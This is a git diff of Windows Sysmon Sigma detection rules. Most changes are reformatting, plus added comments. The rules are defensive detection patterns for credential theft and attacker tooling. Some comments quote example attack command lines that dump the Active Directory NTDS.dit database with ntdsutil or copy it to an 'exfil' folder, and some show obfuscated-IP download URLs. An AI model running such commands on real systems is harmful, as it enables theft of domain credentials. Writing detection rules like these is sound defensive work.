a/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml @@ -1,8 +1,7 @@ title: Non-privileged Usage of Reg or Powershell id: 8f02c935-effe-45b3-8fc9-ef8696a9e41d status: test -description: Search for usage of reg or Powershell by non-privileged users to modify - service configuration in registry +description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community @@ -20,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - add powershell: - CommandLine|contains: + CommandLine|contains: - powershell - set-itemproperty - ' sp ' - new-itemproperty select_data: IntegrityLevel: Medium - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - Services - CommandLine|contains: + CommandLine|contains: - ImagePath - FailureCommand - ServiceDLL diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml index b3c91e1c9..896d0219a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml @@ -25,46 +25,51 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_tool: - - Image|endswith: - - \NTDSDump.exe - - \NTDSDumpEx.exe - - CommandLine|contains|all: - - ntds.dit - - system.hiv - - CommandLine|contains: NTDSgrab.ps1 + # https://github.com/zcgonvh/NTDSDumpEx + - Image|endswith: + - \NTDSDump.exe + - \NTDSDumpEx.exe + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - ntds.dit + - system.hiv + - CommandLine|contains: NTDSgrab.ps1 selection_oneliner_1: - CommandLine|contains|all: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: - ac i ntds - create full selection_onliner_2: - CommandLine|contains|all: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: - '/c copy ' - \windows\ntds\ntds.dit selection_onliner_3: - CommandLine|contains|all: + # ntdsutil "activate instance ntds" "ifm" "create full c:\windows\temp\data\" "quit" "quit" + CommandLine|contains|all: - activate instance ntds - create full selection_powershell: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - ntds.dit set1_selection_ntds_dit: - CommandLine|contains: ntds.dit + CommandLine|contains: ntds.dit set1_selection_image_folder: - - ParentImage|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ - - Image|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ + - ParentImage|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ + - Image|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ condition: process_creation and (1 of selection* or all of set1*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml index eadf2bcbb..7028ec530 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Call To Win32_NTEventlogFile Class id: caf201a9-c2ce-4a26-9c3a-2b9525413711 related: - - id: e2812b49-bae0-4b21-b366-7c142eafcde2 - type: similar + - id: e2812b49-bae0-4b21-b366-7c142eafcde2 + type: similar status: experimental -description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially - suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script references: - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) author: Nasreddine Bencherchali (Nextron Systems) @@ -21,9 +20,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_class: - CommandLine|contains: Win32_NTEventlogFile + CommandLine|contains: Win32_NTEventlogFile selection_function: - CommandLine|contains: + CommandLine|contains: - .BackupEventlog( - .ChangeSecurityPermissions( - .ChangeSecurityPermissionsEx( diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml index 64fc59bd3..9d19b7ed4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml @@ -1,11 +1,10 @@ title: Use Short Name Path in Command Line id: 349d891d-fef0-4fe4-bc53-eee623a15969 related: - - id: a96970af-f126-420d-90e1-d37bf25e50e1 - type: similar + - id: a96970af-f126-420d-90e1-d37bf25e50e1 + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -25,28 +24,27 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ~1\ - ~2\ filter: - - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files\GPSoftware\Directory Opus\dopus.exe - - ParentImage|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - \veam.backup.shell.exe - - \winget.exe - - \Everything\Everything.exe - - ParentImage|contains: \AppData\Local\Temp\WinGet\ - - CommandLine|contains: - - \appdata\local\webex\webex64\meetings\wbxreport.exe - - C:\Program Files\Git\post-install.bat - - C:\Program Files\Git\cmd\scalar.exe + - ParentImage: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files\GPSoftware\Directory Opus\dopus.exe + - ParentImage|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - \veam.backup.shell.exe + - \winget.exe + - \Everything\Everything.exe + - ParentImage|contains: \AppData\Local\Temp\WinGet\ + - CommandLine|contains: + - \appdata\local\webex\webex64\meetings\wbxreport.exe + - C:\Program Files\Git\post-install.bat + - C:\Program Files\Git\cmd\scalar.exe condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml index 414a39ec2..34c7f9615 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml @@ -1,11 +1,10 @@ title: Use Short Name Path in Image id: a96970af-f126-420d-90e1-d37bf25e50e1 related: - - id: 349d891d-fef0-4fe4-bc53-eee623a15969 - type: similar + - id: 349d891d-fef0-4fe4-bc53-eee623a15969 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -29,25 +28,24 @@ detection: - ~1\ - ~2\ filter1: - - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - ParentImage|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - Product: InstallShield (R) - - Description: InstallShield (R) Setup Engine - - Company: InstallShield Software Corporation + - ParentImage: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) + - ParentImage|endswith: + - \WebEx\WebexHost.exe # Spawns a shortened version of the CLI and Image processes + - \thor\thor64.exe + - Product: InstallShield (R) + - Description: InstallShield (R) Setup Engine + - Company: InstallShield Software Corporation filter_installers: - - Image|contains|all: - - \AppData\ - - \Temp\ - - Image|endswith: - - ~1\unzip.exe - - ~1\7zG.exe + - Image|contains|all: + - \AppData\ + - \Temp\ + - Image|endswith: + - ~1\unzip.exe + - ~1\7zG.exe condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml index 6f89e7a17..5274feb87 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml @@ -1,11 +1,10 @@ title: Use NTFS Short Name in Command Line id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 related: - - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b - type: similar + - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -25,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ~1.exe - ~1.bat - ~1.msi @@ -45,13 +44,12 @@ detection: - ~2.js - ~2.hta filter: - - ParentImage|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE + - ParentImage|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml index 833fb938d..1989811a6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml @@ -1,11 +1,10 @@ title: Use NTFS Short Name in Image id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b related: - - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 - type: similar + - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image based detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -56,8 +55,7 @@ detection: Image: C:\PROGRA~1\WinZip\WZPREL~1.EXE filter_optional_vcred: Image|endswith: \VCREDI~1.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Software Installers level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml index cf32ba624..feb916880 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml @@ -1,8 +1,7 @@ title: Obfuscated IP Download Activity id: cb5a2333-56cf-4562-8fcb-22ba1bca728d status: test -description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) - in an URL combined with a download command +description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_command: - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' @@ -29,26 +28,31 @@ detection: - DownloadFile - DownloadString selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_command and 1 of selection_ip_* and - not 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_command and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml index eefa77263..bc203cdfd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml @@ -1,8 +1,7 @@ title: Obfuscated IP Via CLI id: 56d19cb4-6414-4769-9644-1ed35ffbb148 status: experimental -description: Detects usage of an encoded/obfuscated version of an IP address (hex, - octal, etc.) via command line +description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 @@ -24,26 +23,31 @@ detection: - \ping.exe - \arp.exe selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_img and 1 of selection_ip_* and not - 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_img and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml index ba836f655..fcd991290 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml @@ -1,9 +1,7 @@ title: Suspicious Office Token Search Via CLI id: 6d3a3952-6530-44a3-8554-cf17c116c615 status: test -description: Detects possible search for office tokens via CLI by looking for the - string "eyJ0eX". This string is used as an anchor to look for the start of the - JWT token used by office and similar apps. +description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps. references: - https://mrd0x.com/stealing-tokens-from-office-applications/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: - - eyJ0eXAiOi + CommandLine|contains: + - eyJ0eXAiOi # {"typ": - ' eyJ0eX' - ' "eyJ0eX"' - - ' ''eyJ0eX''' + - " 'eyJ0eX'" condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml index 428d0c233..e4f2a91fa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml @@ -1,8 +1,7 @@ title: Suspicious Process Parents id: cbec226f-63d9-4eca-9f52-dfb6652f24df status: test -description: Detects suspicious parent processes that should not have any children - or should only have a single possible child program +description: Detects suspicious parent processes that should not have any children or should only have a single possible child program references: - https://twitter.com/x86matthew/status/1505476263464607744?s=12 - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b @@ -29,6 +28,7 @@ detection: ParentImage|endswith: - \csrss.exe - \certutil.exe + # - '\schtasks.exe' - \eventvwr.exe - \calc.exe - \notepad.exe @@ -36,14 +36,13 @@ detection: Image|endswith: - \WerFault.exe - \wermgr.exe - - \conhost.exe - - \mmc.exe - - \win32calc.exe + - \conhost.exe # csrss.exe, certutil.exe + - \mmc.exe # eventvwr.exe + - \win32calc.exe # calc.exe - \notepad.exe filter_null: - Image: null - condition: process_creation and (selection or ( selection_special and not 1 of - filter_* )) + Image: + condition: process_creation and (selection or ( selection_special and not 1 of filter_* )) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml index 2220e496b..cc3a99ad9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml @@ -1,11 +1,10 @@ title: Privilege Escalation via Named Pipe Impersonation id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b related: - - id: f35c5d71-b489-4e22-a115-f003df287317 - type: derived + - id: f35c5d71-b489-4e22-a115-f003df287317 + type: derived status: test -description: Detects a remote file copy attempt to a hidden network share. This may - indicate lateral movement or data staging activity. +description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. references: - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html author: Tim Rauch @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_name: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + - Image|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - echo - '>' - \\\\.\\pipe\\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml index 5c139c16a..595f64922 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml @@ -1,8 +1,7 @@ title: Private Keys Reconnaissance Via CommandLine Tools id: 213d6a77-3d55-4ce8-ba74-fcfef741974e status: test -description: Adversaries may search for private key certificate files on compromised - systems for insecurely stored credential +description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -20,24 +19,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: 'dir ' + CommandLine|contains: 'dir ' selection_pwsh_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: 'Get-ChildItem ' + CommandLine|contains: 'Get-ChildItem ' selection_findstr: - - Image|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - Image|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_ext: - CommandLine|contains: + CommandLine|contains: - .key - .pgp - .gpg @@ -48,8 +47,7 @@ detection: - .cer - .p7b - .asc - condition: process_creation and (selection_ext and (all of selection_cmd_* or - all of selection_pwsh_* or selection_findstr)) + condition: process_creation and (selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml index 3d75e99ac..114dad09c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml @@ -1,8 +1,7 @@ title: Suspicious RunAs-Like Flag Combination id: 50d66fb0-03f8-4da0-8add-84e77d12a020 status: test -description: Detects suspicious command line flags that let the user set a target - user and command as e.g. seen in PsExec-like tools +description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools references: - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html author: Florian Roth (Nextron Systems) @@ -18,16 +17,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_user: - CommandLine|contains: + CommandLine|contains: - ' -u system ' - ' --user system ' - ' -u NT' - ' -u "NT' - - ' -u ''NT' + - " -u 'NT" - ' --system ' - ' -u administrator ' selection_command: - CommandLine|contains: + CommandLine|contains: - ' -c cmd' - ' -c "cmd' - ' -c powershell' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml index fffbb82f8..e17723030 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml @@ -33,20 +33,20 @@ detection: - \wininit.exe - \winlogon.exe filter_sys: - - ParentImage|endswith: - - \SavService.exe - - \ngen.exe - - ParentImage|contains: - - \System32\ - - \SysWOW64\ + - ParentImage|endswith: + - \SavService.exe + - \ngen.exe + - ParentImage|contains: + - \System32\ + - \SysWOW64\ filter_msmpeng: ParentImage|contains: - \Windows Defender\ - \Microsoft Security Client\ ParentImage|endswith: \MsMpEng.exe filter_null: - - ParentImage: null - - ParentImage: '-' + - ParentImage: + - ParentImage: '-' condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Some security products seem to spawn these diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml index db85c6bf5..f6a0bc46e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml @@ -1,8 +1,7 @@ title: Suspicious Program Names id: efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6 status: test -description: Detects suspicious patterns in program names or folders that are often - found in malicious samples or hacktools +description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: Florian Roth (Nextron Systems) @@ -20,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|contains: - - \CVE-202 - - \CVE202 - - Image|endswith: - - \poc.exe - - \artifact.exe - - \artifact64.exe - - \artifact_protected.exe - - \artifact32.exe - - \artifact32big.exe - - obfuscated.exe - - obfusc.exe - - \meterpreter + - Image|contains: + - \CVE-202 # Update this when we reach the year 2100 + - \CVE202 # Update this when we reach the year 2100 + - Image|endswith: + - \poc.exe + - \artifact.exe + - \artifact64.exe + - \artifact_protected.exe + - \artifact32.exe + - \artifact32big.exe + - obfuscated.exe + - obfusc.exe + - \meterpreter selection_commandline: - CommandLine|contains: + CommandLine|contains: - inject.ps1 - Invoke-CVE - pupy.ps1 diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml index 387a0d519..64da4cc8e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml @@ -1,11 +1,10 @@ title: Recon Information for Export with Command Prompt id: aa2efee7-34dd-446e-8a37-40790a66efd7 related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md author: frack113 @@ -23,15 +22,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: - - \tree.com - - \WMIC.exe - - \doskey.exe - - \sc.exe - - OriginalFileName: - - wmic.exe - - DOSKEY.EXE - - sc.exe + - Image|endswith: + - \tree.com + - \WMIC.exe + - \doskey.exe + - \sc.exe + - OriginalFileName: + - wmic.exe + - DOSKEY.EXE + - sc.exe selection_redirect: ParentCommandLine|contains: - ' > %TEMP%\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml index 1226398cd..0c1582ff1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml @@ -1,11 +1,10 @@ title: Suspicious Process Execution From Fake Recycle.Bin Folder id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0 related: - - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca - type: derived + - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca + type: derived status: experimental -description: Detects process execution from a fake recycle bin folder, often used - to avoid security solution. +description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. references: - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ @@ -25,6 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|contains: + # e.g. C:\$RECYCLER.BIN - RECYCLERS.BIN\ - RECYCLER.BIN\ condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml index 98f5aabbe..95cee3fac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml +++ 